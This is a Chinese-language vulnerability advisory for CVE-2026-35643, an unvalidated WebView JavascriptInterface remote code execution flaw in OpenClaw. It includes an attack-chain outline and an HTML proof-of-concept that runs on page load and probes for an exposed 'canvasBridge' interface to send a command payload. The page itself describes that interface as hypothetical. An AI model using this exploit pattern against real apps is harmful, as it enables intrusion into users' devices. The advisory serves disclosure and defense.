IPBUF安全漏洞报告
English
CVE-2026-35643 CVSS 8.8 高危

CVE-2026-35643 OpenClaw 任意代码执行漏洞

披露日期: 2026-04-10
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-35643
漏洞类型
远程代码执行 (RCE)
CVSS评分
8.8 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
OpenClaw

相关标签

RCE远程代码执行WebViewAndroidOpenClawJavascriptInterface

漏洞概述

OpenClaw 2026.3.22 之前的版本存在严重的未验证 WebView JavascriptInterface 漏洞。由于缺乏对 WebView 接口的有效验证,攻击者可诱导用户访问恶意页面,进而注入任意指令。利用该漏洞,攻击者可调用 canvas bridge 在 Android 应用程序上下文中执行恶意代码,完全控制受影响的应用。

技术细节

该漏洞的根源在于 OpenClaw 应用在 Android WebView 组件中配置了 JavascriptInterface,特别是涉及 Canvas Bridge 的部分,但未实施严格的来源验证和输入过滤机制。在 Android 开发中,不当地使用 `addJavascriptInterface` 可能允许网页脚本直接调用 Android 的 Java 方法。攻击者通过网络向量诱导受害者访问攻击者控制的恶意网页。当该网页在 OpenClaw 的 WebView 中加载时,其中的恶意 JavaScript 代码能够直接调用暴露的接口。通过精心构造的 Payload,攻击者可以绕过沙箱限制,在 Android 应用程序的上下文中执行任意系统指令。由于应用通常具有一定的权限,这种 RCE 攻击可能导致数据泄露、设备被控等严重后果。

攻击链分析

STEP 1
1. 侦察与准备
攻击者发现 OpenClaw 应用存在未验证的 WebView JavascriptInterface,并准备包含恶意 JavaScript 代码的网页。
STEP 2
2. 投递攻击载荷
攻击者通过网络(如钓鱼邮件、恶意链接)诱导受害者使用 OpenClaw 应用访问该恶意网页。
STEP 3
3. 触发漏洞
受害者加载网页后,WebView 渲染页面,恶意 JavaScript 代码开始执行并尝试调用暴露的 Canvas Bridge 接口。
STEP 4
4. 执行代码
由于缺乏验证,恶意载荷成功调用 Android 端方法,在 OpenClaw 应用的上下文中注入并执行任意指令。
STEP 5
5. 达成目标
攻击者获得应用权限,窃取敏感数据或进一步控制设备,造成机密性、完整性和可用性的破坏。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- HTML PoC for CVE-2026-35643 --> <html> <body> <h1>OpenClaw RCE PoC</h1> <script> // Attempt to exploit the unvalidated JavascriptInterface // Assuming the interface is named 'canvasBridge' based on the description function triggerExploit() { try { // Check if the interface exists in the window object if (typeof window.canvasBridge !== 'undefined') { console.log("[+] Found vulnerable interface: canvasBridge"); // Hypothetical method to execute commands or inject instructions // The payload aims to execute arbitrary instructions var maliciousPayload = { action: 'execute', command: 'touch /tmp/pwned' // Example command }; // Invoke the interface method window.canvasBridge.inject(JSON.stringify(maliciousPayload)); alert("[+] Payload sent!"); } else { console.log("[-] Interface not found. Scanning window object..."); for (var key in window) { if (window[key] && typeof window[key] === 'object' && window[key].getClass) { console.log("[+] Potential Interface: " + key); } } } } catch (e) { console.log("Error: " + e.message); } } // Trigger automatically on load window.onload = triggerExploit; </script> </body> </html>

影响范围

OpenClaw < 2026.3.22

防御指南

临时缓解措施
用户应避免点击不明链接或使用该应用访问不可信的网页。建议暂时停止使用受影响版本,直到应用更新。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表